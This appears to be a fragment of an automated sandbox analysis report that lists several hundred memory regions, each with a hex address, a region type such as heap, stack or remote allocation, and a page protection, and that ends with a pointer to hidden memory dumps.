page execute and read and write
|
||
|
16CB9350000
|
remote allocation
|
page read and write
|
||
|
135A5520000
|
heap
|
page read and write
|
||
|
122D000
|
heap
|
page read and write
|
||
|
7FFAAC290000
|
trusted library allocation
|
page read and write
|
||
|
15A0000
|
heap
|
page read and write
|
||
|
15D0000
|
heap
|
page read and write
|
||
|
1AF1D000
|
stack
|
page read and write
|
||
|
1242000
|
heap
|
page read and write
|
||
|
7FFAAC2C1000
|
trusted library allocation
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
1CA98000
|
heap
|
page read and write
|
||
|
F80000
|
heap
|
page read and write
|
||
|
135A5641000
|
heap
|
page read and write
|
||
|
7FFAAC450000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC340000
|
trusted library allocation
|
page execute and read and write
|
||
|
FE0000
|
heap
|
page execute and read and write
|
||
|
2B128E89000
|
heap
|
page read and write
|
||
|
7FFAAC3B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CAB7000
|
heap
|
page read and write
|
||
|
1555000
|
heap
|
page read and write
|
||
|
7FFAAC2AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
12AA000
|
heap
|
page read and write
|
||
|
1228000
|
heap
|
page read and write
|
||
|
2117C202000
|
heap
|
page read and write
|
||
|
123B000
|
heap
|
page read and write
|
||
|
131A5000
|
trusted library allocation
|
page read and write
|
||
|
31B1000
|
trusted library allocation
|
page read and write
|
||
|
2117C213000
|
heap
|
page read and write
|
||
|
7FFAAC2BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
14FF000
|
stack
|
page read and write
|
||
|
2E85000
|
trusted library allocation
|
page read and write
|
||
|
2117C860000
|
remote allocation
|
page read and write
|
||
|
7FFAAC2C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
21EDC265000
|
heap
|
page read and write
|
||
|
FC0000
|
trusted library allocation
|
page read and write
|
||
|
1273000
|
trusted library allocation
|
page read and write
|
||
|
1C9FE000
|
stack
|
page read and write
|
||
|
287A87E000
|
unkown
|
page readonly
|
||
|
7FFAAC2C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC2DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
135A5647000
|
heap
|
page read and write
|
||
|
D02000
|
heap
|
page read and write
|
||
|
7FFAAC396000
|
trusted library allocation
|
page execute and read and write
|
||
|
2117C0B0000
|
heap
|
page read and write
|
||
|
2AA9000
|
trusted library allocation
|
page read and write
|
||
|
1902000
|
heap
|
page read and write
|
||
|
7FFAAC2A0000
|
trusted library allocation
|
page read and write
|
||
|
16CB9426000
|
heap
|
page read and write
|
||
|
128D000
|
heap
|
page read and write
|
||
|
F3A593B000
|
stack
|
page read and write
|
||
|
135A566D000
|
heap
|
page read and write
|
||
|
124F000
|
heap
|
page read and write
|
||
|
21EDDD10000
|
remote allocation
|
page read and write
|
||
|
16CB9230000
|
heap
|
page read and write
|
||
|
1C402000
|
heap
|
page read and write
|
||
|
1064000
|
heap
|
page read and write
|
||
|
21EDC400000
|
heap
|
page read and write
|
||
|
7FFAAC422000
|
trusted library allocation
|
page read and write
|
||
|
1C53E000
|
stack
|
page read and write
|
||
|
B60000
|
trusted library allocation
|
page read and write
|
||
|
13141000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC2CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC330000
|
trusted library allocation
|
page read and write
|
||
|
C23000
|
heap
|
page read and write
|
||
|
123D000
|
heap
|
page read and write
|
||
|
105F000
|
heap
|
page read and write
|
||
|
16CB9426000
|
heap
|
page read and write
|
||
|
16CB93E1000
|
heap
|
page read and write
|
||
|
A10000
|
heap
|
page read and write
|
||
|
1246000
|
heap
|
page read and write
|
||
|
255EE0E9000
|
heap
|
page read and write
|
||
|
102C000
|
heap
|
page read and write
|
||
|
2117C860000
|
remote allocation
|
page read and write
|
||
|
1213000
|
heap
|
page read and write
|
||
|
1BAEC000
|
stack
|
page read and write
|
||
|
7FFAAC2BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
BF0000
|
heap
|
page read and write
|
||
|
135A566B000
|
heap
|
page read and write
|
||
|
16CB93DB000
|
heap
|
page read and write
|
||
|
FB0000
|
heap
|
page execute and read and write
|
||
|
2A9F000
|
stack
|
page read and write
|
||
|
135A5661000
|
heap
|
page read and write
|
||
|
1248000
|
heap
|
page read and write
|
||
|
2FB1000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC2C4000
|
trusted library allocation
|
page read and write
|
||
|
C2B000
|
heap
|
page read and write
|
||
|
125C000
|
heap
|
page read and write
|
||
|
16CB94F0000
|
heap
|
page read and write
|
||
|
7FFAAC29D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AAD000
|
trusted library allocation
|
page read and write
|
||
|
1213000
|
heap
|
page read and write
|
||
|
2B128E4B000
|
heap
|
page read and write
|
||
|
16CB9426000
|
heap
|
page read and write
|
||
|
10E5000
|
heap
|
page read and write
|
||
|
1245000
|
heap
|
page read and write
|
||
|
7FFAAC294000
|
trusted library allocation
|
page read and write
|
||
|
EFF000
|
stack
|
page read and write
|
||
|
31FE000
|
stack
|
page read and write
|
||
|
10BD000
|
heap
|
page read and write
|
||
|
287AAFE000
|
stack
|
page read and write
|
||
|
1021000
|
heap
|
page read and write
|
||
|
1CA90000
|
heap
|
page read and write
|
||
|
1B92F000
|
stack
|
page read and write
|
||
|
1260000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC2D1000
|
trusted library allocation
|
page read and write
|
||
|
C5C000
|
heap
|
page read and write
|
||
|
1B7E3000
|
heap
|
page execute and read and write
|
||
|
135A5697000
|
heap
|
page read and write
|
||
|
1A98DDC0000
|
heap
|
page read and write
|
||
|
1C43F000
|
stack
|
page read and write
|
||
|
124C000
|
heap
|
page read and write
|
||
|
7FF77C910000
|
unkown
|
page readonly
|
||
|
1CDAF000
|
stack
|
page read and write
|
||
|
1BEFF000
|
stack
|
page read and write
|
||
|
31A9000
|
trusted library allocation
|
page read and write
|
||
|
3201000
|
trusted library allocation
|
page read and write
|
||
|
135A5654000
|
heap
|
page read and write
|
||
|
21EDDD10000
|
remote allocation
|
page read and write
|
||
|
1BCFE000
|
stack
|
page read and write
|
||
|
7FFAAC3C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
103C000
|
heap
|
page read and write
|
||
|
2B128E2B000
|
heap
|
page read and write
|
||
|
BD4547E000
|
unkown
|
page readonly
|
||
|
1287000
|
heap
|
page read and write
|
||
|
C2C000
|
heap
|
page read and write
|
||
|
7D1000
|
stack
|
page read and write
|
||
|
7FFAAC2EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
21EDDE02000
|
trusted library allocation
|
page read and write
|
||
|
16CB93AF000
|
heap
|
page read and write
|
||
|
131A1000
|
trusted library allocation
|
page read and write
|
||
|
B30000
|
unkown
|
page readonly
|
||
|
7FFAAC284000
|
trusted library allocation
|
page read and write
|
||
|
16CB93AE000
|
heap
|
page read and write
|
||
|
C62000
|
heap
|
page read and write
|
||
|
1B930000
|
heap
|
page execute and read and write
|
||
|
3020000
|
heap
|
page read and write
|
||
|
B00000
|
heap
|
page read and write
|
||
|
31A1000
|
trusted library allocation
|
page read and write
|
||
|
21EDC213000
|
heap
|
page read and write
|
||
|
C58000
|
heap
|
page read and write
|
||
|
1602000
|
heap
|
page read and write
|
||
|
7FFAAC2C0000
|
trusted library allocation
|
page read and write
|
||
|
1100000
|
heap
|
page read and write
|
||
|
10F1000
|
stack
|
page read and write
|
||
|
25157E02000
|
heap
|
page read and write
|
||
|
7FFAAC2D4000
|
trusted library allocation
|
page read and write
|
||
|
16CB93CB000
|
heap
|
page read and write
|
||
|
2B128C70000
|
heap
|
page read and write
|
||
|
25158000000
|
heap
|
page read and write
|
||
|
7FFAAC2B0000
|
trusted library allocation
|
page read and write
|
||
|
12C3000
|
heap
|
page read and write
|
||
|
1C22E000
|
stack
|
page read and write
|
||
|
7FFAAC283000
|
trusted library allocation
|
page execute and read and write
|
||
|
135A566C000
|
heap
|
page read and write
|
||
|
7FFAAC2CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
18FE000
|
stack
|
page read and write
|
||
|
2117C25C000
|
heap
|
page read and write
|
||
|
2B128E60000
|
heap
|
page read and write
|
||
|
7FFAAC2B4000
|
trusted library allocation
|
page read and write
|
||
|
255EE070000
|
heap
|
page read and write
|
||
|
1102000
|
heap
|
page read and write
|
||
|
C87000
|
heap
|
page read and write
|
||
|
2FA1000
|
trusted library allocation
|
page read and write
|
||
|
127B000
|
heap
|
page read and write
|
||
|
1CEAA000
|
stack
|
page read and write
|
||
|
25158490000
|
trusted library allocation
|
page read and write
|
||
|
135A5636000
|
heap
|
page read and write
|
||
|
12E21000
|
trusted library allocation
|
page read and write
|
||
|
7FF77C910000
|
unkown
|
page readonly
|
||
|
1224000
|
heap
|
page read and write
|
||
|
1213000
|
heap
|
page read and write
|
||
|
BD445AB000
|
stack
|
page read and write
|
||
|
1240000
|
trusted library allocation
|
page read and write
|
||
|
1C623000
|
stack
|
page read and write
|
||
|
1B67D000
|
stack
|
page read and write
|
||
|
12FA1000
|
trusted library allocation
|
page read and write
|
||
|
89EA67F000
|
stack
|
page read and write
|
||
|
1240000
|
heap
|
page read and write
|
||
|
89EA97C000
|
stack
|
page read and write
|
||
|
25158602000
|
trusted library allocation
|
page read and write
|
||
|
135A566E000
|
heap
|
page read and write
|
||
|
BA0000
|
heap
|
page execute and read and write
|
||
|
1B5BD000
|
stack
|
page read and write
|
||
|
16CB9310000
|
heap
|
page read and write
|
||
|
135A564D000
|
heap
|
page read and write
|
||
|
123A000
|
heap
|
page read and write
|
||
|
C00000
|
heap
|
page read and write
|
||
|
1302000
|
heap
|
page read and write
|
||
|
1BD4C000
|
heap
|
page read and write
|
||
|
1002000
|
heap
|
page read and write
|
||
|
7FFAAC2FC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C525000
|
stack
|
page read and write
|
||
|
2117C302000
|
heap
|
page read and write
|
||
|
A41732B000
|
stack
|
page read and write
|
||
|
309E000
|
stack
|
page read and write
|
||
|
A4178FD000
|
stack
|
page read and write
|
||
|
BD4537E000
|
stack
|
page read and write
|
||
|
1C8FE000
|
stack
|
page read and write
|
||
|
7FFAAC370000
|
trusted library allocation
|
page read and write
|
||
|
1276000
|
heap
|
page read and write
|
||
|
135A5667000
|
heap
|
page read and write
|
||
|
2FAD000
|
trusted library allocation
|
page read and write
|
||
|
2066CFE000
|
stack
|
page read and write
|
||
|
7FFAAC340000
|
trusted library allocation
|
page read and write
|
||
|
F50000
|
heap
|
page read and write
|
||
|
1256000
|
heap
|
page read and write
|
||
|
1602000
|
heap
|
page read and write
|
||
|
7FFAAC350000
|
trusted library allocation
|
page read and write
|
||
|
16CB93AE000
|
heap
|
page read and write
|
||
|
135A5658000
|
heap
|
page read and write
|
||
|
7FFAAC376000
|
trusted library allocation
|
page execute and read and write
|
||
|
31A5000
|
trusted library allocation
|
page read and write
|
||
|
1236000
|
heap
|
page read and write
|
||
|
FA0000
|
trusted library allocation
|
page read and write
|
||
|
1BDFE000
|
stack
|
page read and write
|
||
|
F50000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC462000
|
trusted library allocation
|
page read and write
|
||
|
4CC807F000
|
stack
|
page read and write
|
||
|
255EE030000
|
heap
|
page read and write
|
||
|
1250000
|
heap
|
page read and write
|
||
|
16CB93CA000
|
heap
|
page read and write
|
||
|
1221000
|
heap
|
page read and write
|
||
|
16CB9398000
|
heap
|
page read and write
|
||
|
C98000
|
heap
|
page read and write
|
||
|
7FFAAC2C0000
|
trusted library allocation
|
page read and write
|
||
|
EF1000
|
stack
|
page read and write
|
||
|
1213000
|
heap
|
page read and write
|
||
|
7FFAAC3D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B61D000
|
stack
|
page read and write
|
||
|
30E0000
|
heap
|
page read and write
|
||
|
1D3AC000
|
stack
|
page read and write
|
||
|
1BDFF000
|
stack
|
page read and write
|
||
|
7FFAAC360000
|
trusted library allocation
|
page read and write
|
||
|
320F000
|
trusted library allocation
|
page read and write
|
||
|
1032000
|
heap
|
page read and write
|
||
|
1B9F0000
|
heap
|
page execute and read and write
|
||
|
12A8000
|
heap
|
page read and write
|
||
|
1AE50000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC2C4000
|
trusted library allocation
|
page read and write
|
||
|
1402000
|
heap
|
page read and write
|
||
|
1550000
|
heap
|
page read and write
|
||
|
16CB9330000
|
heap
|
page read and write
|
||
|
255EE060000
|
heap
|
page read and write
|
||
|
2B128E3B000
|
heap
|
page read and write
|
||
|
122C000
|
heap
|
page read and write
|
||
|
1B900000
|
heap
|
page read and write
|
||
|
12FA3000
|
trusted library allocation
|
page read and write
|
||
|
1B7CE000
|
stack
|
page read and write
|
||
|
1CAFE000
|
stack
|
page read and write
|
||
|
12BF000
|
heap
|
page read and write
|
||
|
1A98DDF8000
|
heap
|
page read and write
|
||
|
1237000
|
heap
|
page read and write
|
||
|
7FFAAC350000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC2D4000
|
trusted library allocation
|
page read and write
|
||
|
1251000
|
heap
|
page read and write
|
||
|
2AAF000
|
trusted library allocation
|
page read and write
|
||
|
FFC000
|
heap
|
page read and write
|
||
|
1B61D000
|
stack
|
page read and write
|
||
|
12C3000
|
heap
|
page read and write
|
||
|
12C7000
|
heap
|
page read and write
|
||
|
135A5440000
|
heap
|
page read and write
|
||
|
10AF000
|
heap
|
page read and write
|
||
|
1002000
|
heap
|
page read and write
|
||
|
B46000
|
unkown
|
page readonly
|
||
|
17E0000
|
trusted library allocation
|
page read and write
|
||
|
1CFA8000
|
stack
|
page read and write
|
||
|
7FFAAC3A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
16CB93B1000
|
heap
|
page read and write
|
||
|
1C9FE000
|
stack
|
page read and write
|
||
|
2B128F00000
|
heap
|
page read and write
|
||
|
1CADE000
|
heap
|
page read and write
|
||
|
123F000
|
heap
|
page read and write
|
||
|
287A77E000
|
unkown
|
page readonly
|
||
|
16CB93AE000
|
heap
|
page read and write
|
||
|
287A7FE000
|
stack
|
page read and write
|
||
|
21EDC280000
|
heap
|
page read and write
|
||
|
1238000
|
heap
|
page read and write
|
||
|
3211000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC3D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
10F1000
|
stack
|
page read and write
|
||
|
30D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC2B4000
|
trusted library allocation
|
page read and write
|
||
|
1BD83000
|
heap
|
page read and write
|
||
|
21EDC263000
|
heap
|
page read and write
|
||
|
7FFAAC31C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BDFF000
|
stack
|
page read and write
|
||
|
DB0000
|
heap
|
page read and write
|
||
|
1BCF0000
|
heap
|
page read and write
|
||
|
FD0000
|
heap
|
page read and write
|
||
|
21EDC317000
|
heap
|
page read and write
|
||
|
2B128F02000
|
heap
|
page read and write
|
||
|
131A8000
|
trusted library allocation
|
page read and write
|
||
|
BD4597E000
|
unkown
|
page readonly
|
||
|
1240000
|
heap
|
page read and write
|
||
|
135A562B000
|
heap
|
page read and write
|
||
|
1BA02000
|
heap
|
page read and write
|
||
|
12AF000
|
heap
|
page read and write
|
||
|
135A5668000
|
heap
|
page read and write
|
||
|
2117C200000
|
heap
|
page read and write
|
||
|
1B7E0000
|
heap
|
page execute and read and write
|
||
|
1400000
|
heap
|
page read and write
|
||
|
135A565A000
|
heap
|
page read and write
|
||
|
12C0000
|
heap
|
page read and write
|
||
|
2D2E000
|
stack
|
page read and write
|
||
|
1C890000
|
heap
|
page read and write
|
||
|
135A5E02000
|
trusted library allocation
|
page read and write
|
||
|
25157D20000
|
heap
|
page read and write
|
||
|
13F0000
|
heap
|
page execute and read and write
|
||
|
15D0000
|
heap
|
page execute and read and write
|
||
|
1054000
|
heap
|
page read and write
|
||
|
135A5657000
|
heap
|
page read and write
|
||
|
12C0000
|
heap
|
page read and write
|
||
|
1B41D000
|
stack
|
page read and write
|
||
|
25157E48000
|
heap
|
page read and write
|
||
|
25157E35000
|
heap
|
page read and write
|
||
|
C43000
|
heap
|
page read and write
|
||
|
EF1000
|
stack
|
page read and write
|
||
|
C00000
|
heap
|
page read and write
|
||
|
16CB93F3000
|
heap
|
page read and write
|
||
|
124F000
|
heap
|
page read and write
|
||
|
12AA5000
|
trusted library allocation
|
page read and write
|
||
|
1B3AC000
|
stack
|
page read and write
|
||
|
C56000
|
heap
|
page read and write
|
||
|
135A5677000
|
heap
|
page read and write
|
||
|
101C000
|
heap
|
page read and write
|
||
|
C3F000
|
heap
|
page read and write
|
||
|
7FF77C923000
|
unkown
|
page readonly
|
||
|
10BE000
|
heap
|
page read and write
|
||
|
12C5000
|
heap
|
page read and write
|
||
|
7FFAAC3E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
CC1000
|
heap
|
page read and write
|
||
|
7FFAAC452000
|
trusted library allocation
|
page read and write
|
||
|
F81000
|
stack
|
page read and write
|
||
|
16CB940D000
|
heap
|
page read and write
|
||
|
12AA1000
|
trusted library allocation
|
page read and write
|
||
|
1013000
|
heap
|
page read and write
|
||
|
16CB93E3000
|
heap
|
page read and write
|
||
|
7FFAAC462000
|
trusted library allocation
|
page read and write
|
||
|
1550000
|
heap
|
page read and write
|
||
|
FC0000
|
heap
|
page read and write
|
||
|
2B128D70000
|
heap
|
page read and write
|
||
|
13148000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC2CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
135A5613000
|
heap
|
page read and write
|
||
|
1200000
|
heap
|
page read and write
|
||
|
7FFAAC2DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1802000
|
heap
|
page read and write
|
||
|
11EC000
|
stack
|
page read and write
|
||
|
7FFAAC293000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B128E40000
|
heap
|
page read and write
|
||
|
7FFAAC3A6000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C780000
|
heap
|
page read and write
|
||
|
25157E00000
|
heap
|
page read and write
|
||
|
2F9E000
|
stack
|
page read and write
|
||
|
7FFAAC2BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
319F000
|
stack
|
page read and write
|
||
|
1520000
|
trusted library allocation
|
page read and write
|
||
|
2B129602000
|
heap
|
page read and write
|
||
|
1550000
|
trusted library allocation
|
page read and write
|
||
|
13CF000
|
stack
|
page read and write
|
||
|
123A000
|
heap
|
page read and write
|
||
|
16CB940D000
|
heap
|
page read and write
|
||
|
135A5642000
|
heap
|
page read and write
|
||
|
287B07E000
|
stack
|
page read and write
|
||
|
B10000
|
heap
|
page read and write
|
||
|
7FFAAC2A0000
|
trusted library allocation
|
page read and write
|
||
|
2B129615000
|
heap
|
page read and write
|
||
|
1052000
|
heap
|
page read and write
|
||
|
21EDC1E0000
|
heap
|
page read and write
|
||
|
12AA3000
|
trusted library allocation
|
page read and write
|
||
|
7E0000
|
heap
|
page read and write
|
||
|
CB1000
|
heap
|
page read and write
|
||
|
F60000
|
heap
|
page read and write
|
||
|
A30000
|
heap
|
page read and write
|
||
|
7FFAAC452000
|
trusted library allocation
|
page read and write
|
||
|
1298000
|
heap
|
page read and write
|
||
|
BE0000
|
heap
|
page execute and read and write
|
||
|
21EDDCB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF77C923000
|
unkown
|
page readonly
|
||
|
EFF000
|
stack
|
page read and write
|
||
|
2117C241000
|
heap
|
page read and write
|
||
|
2BB0000
|
heap
|
page read and write
|
||
|
16CB93A7000
|
heap
|
page read and write
|
||
|
25157E69000
|
heap
|
page read and write
|
||
|
16CB9426000
|
heap
|
page read and write
|
||
|
1058000
|
heap
|
page read and write
|
||
|
B90000
|
heap
|
page read and write
|
||
|
7FFB16791000
|
unkown
|
page execute read
|
||
|
1087000
|
heap
|
page read and write
|
||
|
7FFAAC2B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
16CB93CA000
|
heap
|
page read and write
|
||
|
1530000
|
heap
|
page read and write
|
||
|
7FFAAC2D0000
|
trusted library allocation
|
page read and write
|
||
|
135A5550000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC2B0000
|
trusted library allocation
|
page read and write
|
||
|
1274000
|
heap
|
page read and write
|
There are 734 hidden memdumps, click here to show them.